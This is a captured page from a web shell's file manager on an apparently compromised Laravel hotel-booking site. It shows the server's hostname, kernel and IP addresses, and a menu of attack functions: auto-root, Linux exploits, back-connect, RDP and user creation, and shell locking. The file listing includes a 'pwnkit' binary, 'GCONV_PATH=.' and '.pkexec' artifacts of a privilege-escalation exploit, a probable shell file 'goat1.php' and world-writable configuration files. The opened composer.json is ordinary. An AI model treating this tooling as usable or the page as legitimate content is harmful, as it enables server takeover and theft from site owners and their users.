Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo12.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxr-xr-x
.claude
[ DIR ]
drwxr-xr-x
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgmdikp
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
ephkgru
[ DIR ]
drwxr-xr-x
f1zvuil
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
lzxcgtj
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sxnqmah
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
wcmbhvx
[ DIR ]
drwxr-xr-x
xiwovuf
[ DIR ]
drwxr-xr-x
zwraykm
[ DIR ]
drwxr-xr-x
.env
753
B
-rw-rw-rw-
.env.example
558
B
-rw-rw-rw-
.htaccess
1.96
KB
-r--r--r--
.mad-root
0
B
-rw-r--r--
artisan
339
B
-rw-rw-rw-
composer.json
1.72
KB
-rw-rw-rw-
composer.lock
214.87
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
index.php
20.13
KB
-r--r--r--
license-tnzl.php
629
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
86
B
-rw-r--r--
serve-hbms.bat
230
B
-rwxrwxrwx
server.php
216
B
-rw-rw-rw-
signgwph_application
72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "hbms/hotel-booking-management-system", "type": "project", "description": "Laravel hotel booking and management system based on the HBMS PRD.", "keywords": ["laravel", "hotel", "booking", "management", "payroll"], "license": "MIT", "require": { "php": "^8.2", "laravel/framework": "^11.0", "laravel/tinker": "^2.10" }, "require-dev": { "fakerphp/faker": "^1.23", "laravel/pint": "^1.18", "mockery/mockery": "^1.6", "nunomaduro/collision": "^8.6", "phpunit/phpunit": "^11.5" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi", "@php -r \"file_exists('database/database.sqlite') || touch('database/database.sqlite');\"", "@php artisan migrate --graceful --ansi" ], "dev": [ "Composer\\Config::disableProcessTimeout", "php artisan serve" ], "test": [ "@php artisan test" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "php-http/discovery": true } }, "minimum-stability": "stable", "prefer-stable": true }
Close